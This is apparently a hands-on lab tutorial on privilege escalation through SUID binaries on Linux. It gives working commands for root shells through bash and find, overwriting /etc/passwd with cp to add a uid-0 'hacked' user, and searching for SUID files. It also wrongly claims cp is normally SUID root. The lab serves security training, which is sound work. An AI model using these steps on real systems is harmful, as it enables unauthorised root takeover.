Exploit SUID Binaries for Privilege Escalation in Linux

Introduction

In this lab, you will learn about the SUID (Set user ID upon execution) permission and how to leverage it for privilege escalation on Linux systems. The goal is to gain root access by exploiting SUID binaries with various techniques, including using bash, find, cp, and mv commands.

Understanding SUID

In this step, you will understand the concept of SUID permission and its implications.

Typically, when a program is executed on Linux, it runs with the permissions of the current user. However, some programs, like cp, require elevated privileges to perform certain operations, such as copying files to restricted directories. To allow regular users to execute such programs with elevated privileges, the SUID permission can be set on the executable file.

SUID stands for "Set user ID upon execution." When a file has the SUID permission set, it executes with the permissions of its owner, regardless of the user executing it. For example, the cp command is owned by the root user and has the SUID bit set, allowing any user to execute it with root privileges.

To check the SUID permission on the cp command and save the output to a file, run the following command:

ls -l /usr/bin/cp > /home/labex/project/suid_cp.txt

View the contents of the suid_cp.txt file using the following command:

cat /home/labex/project/suid_cp.txt

Expected output:

-rwsr-xr-x 1 root root 141832 Feb  8  2024 /usr/bin/cp

You should see an s in the permission bits, indicating the SUID permission.

While SUID can be useful for allowing regular users to run specific privileged commands, it can also be exploited if the SUID binary provides functionality for executing system commands or modifying files.

Exploiting SUID with bash

In this step, you will learn how to exploit the bash command with SUID permission for privilege escalation.

First, open a terminal and navigate to the /home/labex/project directory.
```
cd /home/labex/project
```
Check the permissions of the bash command.
```
ls -l /bin/bash
```
Expected output:
```
-rwsr-xr-x 1 root root 1037520 Feb 5 2022 /bin/bash
```
If the bash command has the SUID bit set, you can leverage it to execute system commands with root privileges using the following command:
```
bash -p
```
Using whoami, you can verify that you have a root shell.
```
whoami
```
Expected output:
```
root
```
Now, you can create a file named root.txt in the /root directory and verify the contents of the file.
```
touch /root/root.txt
```
You should see the root.txt file in the /root directory.

Exploiting SUID with find

In this step, you will learn how to exploit the find command with SUID permission for privilege escalation.

After last step, you should have a root shell. For this step, you need to logout from the root shell and login again as the labex user by exit command or opening a new terminal.

First, navigate to the /home/labex/project directory:
```
cd /home/labex/project
```
Check the permissions of the find command:
```
ls -l /usr/bin/find
```
If the find command has the SUID bit set, you can leverage it to execute system commands with root privileges.
The syntax for executing a command with find is:
```
find < file > -exec < command > \;
```
Here, <file> can be any file. Let's create a file called test:
```
touch test
```
Now, you can execute commands using find:
```
find test -exec whoami \;
```
This will execute the whoami command with root privileges. However, this method is not convenient for interactive commands like ssh or su.
To get a more convenient root shell, you can execute the /bin/bash command:
```
find test -exec /bin/bash -p \;
```
Note: The -p flag is necessary to preserve the effective user ID (EUID) and prevent it from being reset to the real user ID (RUID).
You should now have a root shell. Create a file named root.txt in the /root directory and verify the contents of the file:
```
touch /root/root.txt
```
You should see the root.txt file in the /root directory.

Exploiting SUID with cp and mv

In this step, you will learn how to exploit the cp and mv commands with SUID permission for privilege escalation by modifying the /etc/passwd or /etc/shadow file.

After last step, you should have a root shell. For this step, you need to logout from the root shell and login again as the labex user by exit command or opening a new terminal.

First, navigate to the /home/labex/project directory:
```
cd /home/labex/project
```
Check the permissions of the cp command:
```
ls -l /bin/cp
```
If the cp command has the SUID bit set, you can proceed with the exploitation.
Copy the contents of /etc/passwd to a file in your home directory:
```
cat /etc/passwd > /home/labex/project/passwd
```
Create a new user entry with the following details:

Username: hacked

Password: pass123

Insert the following line at the end of the /home/labex/project/passwd file:

echo 'hacked:$1$ignite$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash' >> /home/labex/project/passwd

Now, use the cp command with SUID permission to overwrite the /etc/passwd file:
```
cp /home/labex/project/passwd /etc/passwd
```
After overwriting the file, you can switch to the hacked user with the password pass123 using the su command:
```
su hacked
```

Since the hacked user has a user ID (uid) of 0, you will have root privileges.

The exploitation method for the mv command is similar to cp. You can try it yourself.

Finding SUID Binaries

In this step, you will learn how to find SUID binaries on a system that can potentially be exploited for privilege escalation.

You can use the following commands to list all executable files with the SUID bit set:

find / -user root -perm -4000 -print 2> /dev/null
find / -perm -u=s -type f 2> /dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

Navigate to the /home/labex/project directory to perform the following steps.
```
cd /home/labex/project
```
Choose any of the commands to list the SUID binaries on the system and analyze the output.
```
find / -user root -perm -4000 -print 2> /dev/null > check_results.txt
```
Check the contents of the check_results.txt file to view the list of SUID binaries on the system.
```
cat check_results.txt
```
However, the output may contain many files that cannot be exploited for privilege escalation, requiring manual analysis.

Summary

In this lab, you learned about the SUID permission and how to leverage various SUID binaries, such as bash, find, cp, and mv, for privilege escalation on Linux systems. You gained hands-on experience in exploiting these binaries to obtain root access, which is a crucial skill in the field of cybersecurity. The lab provided a practical scenario and guided you through the steps to understand and apply the techniques effectively.